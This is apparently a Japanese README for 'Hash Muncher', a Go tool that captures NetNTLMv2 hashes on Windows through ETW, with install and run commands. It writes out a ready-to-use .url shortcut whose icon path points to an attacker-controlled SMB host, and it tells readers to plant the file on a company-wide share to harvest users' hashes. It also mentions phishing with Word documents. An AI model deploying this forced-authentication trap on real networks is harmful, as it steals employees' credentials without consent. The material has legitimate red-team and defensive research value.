
Windows 8.1 / Windows Server 2016以降において、管理者権限でETWを使用してNetNTLMv2ハッシュを取得します。
Windows 上で管理者権限を使用して、ETW を使って NetNTLMv2 ハッシュを取得する
これをセットアップして実行するには、3 つの異なるオプションがあります。
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
Windows ファイアウォールで「ファイルとプリンターの共有」が許可されていることを確認してください。Hash Muncher は、組み込みの SMB サービスが最初の要求を受信し、ターゲットに応答パケットを送信する必要があるためです。
昇格されたプロンプトで Hash Muncher を実行します
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
IP アドレスをあなたの Hash Muncher マシンの IP アドレスに置き換え、ファイルを(会社全体の)ファイル共有に 'whatever.url' として保存すると、ハッシュが次々と送られてくるのがわかります。
その他の方法は Red Team Notes - Forced Authentication に記載されています。全員に Word 文書をメールで送ってもおそらく成功するでしょうが、それはまったくステルス性がありません。
私は ETW を断続的に試してきましたが、Nettitude Labs の非常にクールな 研究 を見たとき、これを私の好きな言語である Golang で使いやすいツールにしなければならないと確信しました! Nettitude Labs は .Net フレームワークで動作する C# で書かれた実用的な POC を持っており、そちらの方があなたにとってはより良い選択肢かもしれません。ですから、私はここで何かを発明しているわけではなく、単に代替手段としてこれを追加しているだけです。
Windows セキュリティ関連が好きなら、私の攻撃グラフツール Adalanche も気に入るかもしれません。